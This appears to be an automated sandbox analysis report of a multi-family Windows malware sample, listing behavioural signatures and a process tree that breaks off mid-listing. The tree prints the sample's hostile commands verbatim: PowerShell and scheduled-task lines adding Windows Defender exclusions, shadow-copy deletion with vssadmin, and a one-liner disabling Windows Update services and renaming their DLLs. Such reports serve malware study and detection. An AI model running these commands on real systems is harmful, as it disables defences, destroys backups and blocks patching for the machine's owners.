Analysis

  • max time kernel
    139s
  • max time network
    159s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    16/08/2026, 04:45

General

  • Target
    2026-08-16_3e863dd1a76b543ae76b630abec9d1e3_cobalt-strike_coinminer_glassworm_icedid_njrat_vidar.exe
  • Size 40.7MB
  • Sample260816-fdlelsdk71
  • SHA256 eab88cf51011de1d657c49fde6ef99e358e894f48e6b1ffaff35cb7244d6d669
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Detects executables calling ClearMyTracksByProcess 1 IoCs
  • Detects executables containing artifacts associated with disabling Widnows Defender 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 29 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2026-08-16_3e863dd1a76b543ae76b630abec9d1e3_cobalt-strike_coinminer_glassworm_icedid_njrat_vidar.exe
    "C:\Users\Admin\AppData\Local\Temp\2026-08-16_3e863dd1a76b543ae76b630abec9d1e3_cobalt-strike_coinminer_glassworm_icedid_njrat_vidar.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:4140
  • C:\Users\Public\G8d0hL\c8F7Hx.exe
    "C:\Users\Public\G8d0hL\c8F7Hx.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4504
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:3428
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\G8d0hL\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:4620
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\G8d0hL\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2056
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:4860
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:3656
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:5800
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:5860
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:4896
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:2844
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:3852
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4048
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:5088
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:1800
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:4168
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4564
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:6020
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:2176
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:684
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:5968
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:4380
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:2008
                        • C:\Program Files (x86)\AzX8us\AzX8us.exe
                          "C:\Program Files (x86)\AzX8us\AzX8us.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:5292
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\AzX8us" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:236
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\AzX8us" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3452
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4916
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:468
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2724
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\AzX8us" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4960
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\AzX8us" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:4112
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4684
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1644
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\AzX8us\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:6040
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\AzX8us\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:5680
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                                PID:1880
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                  PID:5088
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:1776
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:1672
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop wuauserv
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1716
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  PID:3384
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure wuauserv reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  PID:2524
                                • C:\Windows\SysWOW64\net.exe
                                  net stop UsoSvc
                                  4⤵
                                    PID:2832
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop UsoSvc
                                      5⤵
                                        PID:1948
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config UsoSvc start= disabled
                                      4⤵
                                      • Launches sc.exe
                                      PID:6020
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc failure UsoSvc reset= 0 actions= ""
                                      4⤵
                                      • Launches sc.exe
                                      PID:1564
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop uhssvc
                                      4⤵
                                        PID:2176
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop uhssvc
                                          5⤵
                                            PID:3568
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc config uhssvc start= disabled
                                          4⤵
                                          • Launches sc.exe
                                          PID:5652
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc failure uhssvc reset= 0 actions= ""
                                          4⤵
                                          • Launches sc.exe
                                          PID:3172
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop WaaSMedicSvc
                                          4⤵
                                            PID:3916
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 stop WaaSMedicSvc
                                              5⤵
                                                PID:4532
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc config WaaSMedicSvc start= disabled
                                              4⤵
                                              • Launches sc.exe
                                              PID:804
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc failure WaaSMedicSvc reset= 0 actions= ""
                                              4⤵
                                              • Launches sc.exe
                                              PID:1924
                                            • C:\Windows\SysWOW64\takeown.exe
                                              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:4672
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:1688
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:4936
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:944
                                            • C:\Windows\SysWOW64\takeown.exe
                                              takeown /f C:\Windows\System32\wuaueng.dll
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:5632
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:3216
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:1304
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:3056
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                              4⤵
                                                PID:1772
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                                4⤵
                                                  PID:4072
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                                  4⤵
                                                    PID:1936
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    PID:5464
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c icacls "C:\Program Files (x86)\AzX8us" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                  3⤵
                                                  • Executes a command shell one-liner
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2940
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls "C:\Program Files (x86)\AzX8us" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1256
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c icacls "C:\Program Files (x86)\AzX8us\AzX8us.exe" /inheritance:r
                                                  3⤵
                                                  • Executes a command shell one-liner
                                                  PID:3416
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls "C:\Program Files (x86)\AzX8us\AzX8us.exe" /inheritance:r
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:4376
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c icacls "C:\Program Files (x86)\AzX8us\AzX8us.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                  3⤵
                                                  • Executes a command shell one-liner
                                                  PID:5824
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls "C:\Program Files (x86)\AzX8us\AzX8us.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:1232
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c icacls "C:\Program Files (x86)\AzX8us\AzX8us.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                  3⤵
                                                  • Executes a command shell one-liner
                                                  PID:3100
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls "C:\Program Files (x86)\AzX8us\AzX8us.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:2432
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c icacls "C:\Program Files (x86)\AzX8us\image.png" /inheritance:r
                                                  3⤵
                                                  • Executes a command shell one-liner
                                                  PID:2188
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls "C:\Program Files (x86)\AzX8us\image.png" /inheritance:r
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:3080
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  3⤵
                                                  • Indicator Removal: Clear Persistence
                                                  PID:2608
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                    4⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4488
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    SCHTASKS /Run /TN "Task1"
                                                    4⤵
                                                      PID:2400
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      SCHTASKS /Delete /TN "Task1" /F
                                                      4⤵
                                                        PID:4136
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\AzX8us\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4156
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\AzX8us\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:4904
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\AzX8us\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4708
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\AzX8us\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:3584
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\AzX8us\thumbs.db" /inheritance:r
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:5840
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\AzX8us\thumbs.db" /inheritance:r
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:1484
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\AzX8us\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4188
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\AzX8us\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:4420
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\AzX8us\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:1744
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\AzX8us\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:2564
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\AzX8us\XPSPLOG.dll" /inheritance:r
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4340
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\AzX8us\XPSPLOG.dll" /inheritance:r
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:1728
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\AzX8us\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:2244
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\AzX8us\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:6092
                                                    • C:\Windows\SysWOW64\cmd.exe
